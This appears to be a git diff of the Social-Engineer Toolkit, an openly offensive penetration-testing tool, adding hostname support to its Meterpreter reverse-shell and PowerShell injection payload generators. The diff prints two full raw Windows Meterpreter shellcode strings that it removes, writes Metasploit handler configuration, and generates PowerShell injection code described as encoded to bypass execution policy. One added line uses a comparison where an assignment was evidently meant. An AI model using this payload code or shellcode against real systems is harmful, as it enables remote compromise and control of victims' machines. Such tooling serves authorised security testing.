diff --git a/readme/CHANGES b/readme/CHANGES index 6f0cfd456..6ccd7a4ca 100644 --- a/readme/CHANGES +++ b/readme/CHANGES @@ -1,3 +1,10 @@ +~~~~~~~~~~~~~~~~ +version 4.3.10 +~~~~~~~~~~~~~~~~ + +* Fixed a bug that would cause README to error out (thanks Chris Barrow). +* Added the ability to use hostnames with payloads including pyinjector and multiinjector + ~~~~~~~~~~~~~~~~ version 4.3.9 ~~~~~~~~~~~~~~~~ diff --git a/src/core/payloadgen/create_payloads.py b/src/core/payloadgen/create_payloads.py index a12288325..94b35a391 100644 --- a/src/core/payloadgen/create_payloads.py +++ b/src/core/payloadgen/create_payloads.py @@ -469,6 +469,12 @@ try: filewrite.write("use exploit/multi/handler\nset PAYLOAD %s\nset LHOST 0.0.0.0\nset LPORT %s\nset ExitOnSession false\nexploit -j\n\n" % (choice9,shellcode_port)) filewrite.close() + if validate_ip(choice2) == False: + if choice9 != "windows/meterpreter/reverse_https": + if choice9 != "windows/meterpreter/reverse_http": + print_status("Possible hostname detected, switching to windows/meterpreter/reverse_https") + choice9 == "windows/meterpreter/reverse_https" + if choice9 == "windows/meterpreter/reverse_tcp_allports": portnum = "LPORT=1" if choice9 == "windows/meterpreter/reverse_tcp": @@ -480,20 +486,21 @@ try: shellcode = generate_shellcode(choice9, choice2,portnum) if choice9 == "windows/meterpreter/reverse_http": print_status("Reverse_HTTP takes a few seconds to calculate..One moment..") - #shellcode = r"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x6e\x65\x74\x00\x68\x77\x69\x6e\x69\x54\x68\x4c\x77\x26\x07\xff\xd5\x31\xff\x57\x57\x57\x57\x6a\x00\x54\x68\x3a\x56\x79\xa7\xff\xd5\xeb\x4b\x5b\x31\xc9\x51\x51\x6a\x03\x51\x51\x68\xbb\x01\x00\x00\x53\x50\x68\x57\x89\x9f\xc6\xff\xd5\xeb\x34\x59\x31\xd2\x52\x68\x00\x02\x20\x84\x52\x52\x52\x51\x52\x50\x68\xeb\x55\x2e\x3b\xff\xd5\x89\xc6\x6a\x10\x5b\x31\xff\x57\x57\x57\x57\x56\x68\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x75\x1a\x4b\x74\x10\xeb\xe9\xeb\x49\xe8\xc7\xff\xff\xff\x2f\x64\x57\x70\x31\x00\x00\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x40\x68\x00\x10\x00\x00\x68\x00\x00\x40\x00\x57\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x53\x89\xe7\x57\x68\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89\xe2\xff\xd5\x85\xc0\x74\xcd\x8b\x07\x01\xc3\x85\xc0\x75\xe5\x58\xc3\xe8\x65\xff\xff\xff\x32\x35\x35\x2e\x32\x35\x34\x2e\x32\x35\x33\x2e\x32\x35\x32\x00" shellcode = generate_shellcode(choice9, choice2,portnum) if choice9 == "windows/meterpreter/reverse_tcp_allports": - #shellcode = r"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x68\xff\xfe\xfd\xfc\x68\x02\x00\x01\xbb\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x12\x31\xc0\x66\x8b\x46\x02\x86\xe0\x66\x40\x86\xe0\x66\x89\x46\x02\xeb\xdf\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x01\xc3\x29\xc6\x85\xf6\x75\xec\xc3" print_status("Reverse TCP Allports takes a few seconds to calculate..One moment..") shellcode = generate_shellcode(choice9, choice2,portnum) if choice9 == "windows/shell/reverse_tcp": print_status("Reverse Shell takes a few seconds to calculate..One moment..") shellcode = generate_shellcode(choice9, choice2, portnum) + if choice1 == "shellcode/pyinject": shellcode_port = portnum.replace("LPORT=", "") - - shellcode = shellcode_replace(choice2, shellcode_port, shellcode) + + if validate_ip(choice2) == True: + shellcode = shellcode_replace(choice2, shellcode_port, shellcode) + # break out of the loop if we are only using one payload else keep on if choice1 == "shellcode/pyinject": break multipyinject_payload += shellcode + "," diff --git a/src/core/setcore.py b/src/core/setcore.py index 3ffab4d6e..827559de6 100644 --- a/src/core/setcore.py +++ b/src/core/setcore.py @@ -215,7 +215,7 @@ def print_error(message): print bcolors.RED + bcolors.BOLD + "[!] " + bcolors.ENDC + bcolors.RED + str(message) + bcolors.ENDC def get_version(): - define_version = '4.3.9' + define_version = '4.3.10' return define_version class create_menu: @@ -503,7 +503,7 @@ def update_set(): # Pull the help menu here # def help_menu(): - fileopen = file("README","r").readlines() + fileopen = file("README.txt","r").readlines() for line in fileopen: line = line.rstrip() print line @@ -835,7 +835,7 @@ def show_banner(define_version,graphic): print bcolors.BLUE + """ [---] The Social-Engineer Toolkit ("""+bcolors.YELLOW+"""SET"""+bcolors.BLUE+""") [---] [---] Created by:""" + bcolors.RED+""" David Kennedy """+bcolors.BLUE+"""("""+bcolors.YELLOW+"""ReL1K"""+bcolors.BLUE+""") [---] - [---] Version: """+bcolors.RED+"""%s""" % (define_version) +bcolors.BLUE+""" [---] + [---] Version: """+bcolors.RED+"""%s""" % (define_version) +bcolors.BLUE+""" [---] [---] Codename: '""" + bcolors.YELLOW + """Turbulence""" + bcolors.BLUE + """' [---] [---] Follow us on Twitter: """ + bcolors.PURPLE+ """@trustedsec""" + bcolors.BLUE+""" [---] [---] Follow me on Twitter: """ + bcolors.PURPLE+ """@dave_rel1k""" + bcolors.BLUE+""" [---] diff --git a/src/payloads/powershell/prep.py b/src/payloads/powershell/prep.py index 56ec0a339..09e10ceda 100644 --- a/src/payloads/powershell/prep.py +++ b/src/payloads/powershell/prep.py @@ -29,17 +29,18 @@ else: powershell_inject_x64 = check_config("POWERSHELL_INJECT_PAYLOAD_X64=") powershell_inject_x86 = check_config("POWERSHELL_INJECT_PAYLOAD_X86=") -#def metasploit_shellcode(payload): print_status("Generating x64-based powershell injection code...") -x64 = metasploit_shellcode(powershell_inject_x64) -x64 = shellcode_replace(ipaddr,port, x64) + +if validate_ip(ipaddr) == False: + powershell_inject_x64 = "windows/meterpreter/reverse_https" + powershell_inject_x86 = "windows/meterpreter/reverse_http" + +x64 = "" +x86 = "" + x64 = generate_powershell_alphanumeric_payload(powershell_inject_x64, ipaddr, port, x64) - print_status("Generating x86-based powershell injection code...") -x86 = metasploit_shellcode(powershell_inject_x86) -x86 = shellcode_replace(ipaddr, port, x86) x86 = generate_powershell_alphanumeric_payload(powershell_inject_x86, ipaddr, port, x86) - # check to see if we want to display the powershell command to the user verbose = check_config("POWERSHELL_VERBOSE=") if verbose.lower() == "on": @@ -58,3 +59,4 @@ filewrite.write(x86) filewrite.close() print_status("Finished generating powershell injection bypass.") print_status("Encoded to bypass exececution restriction policy...") +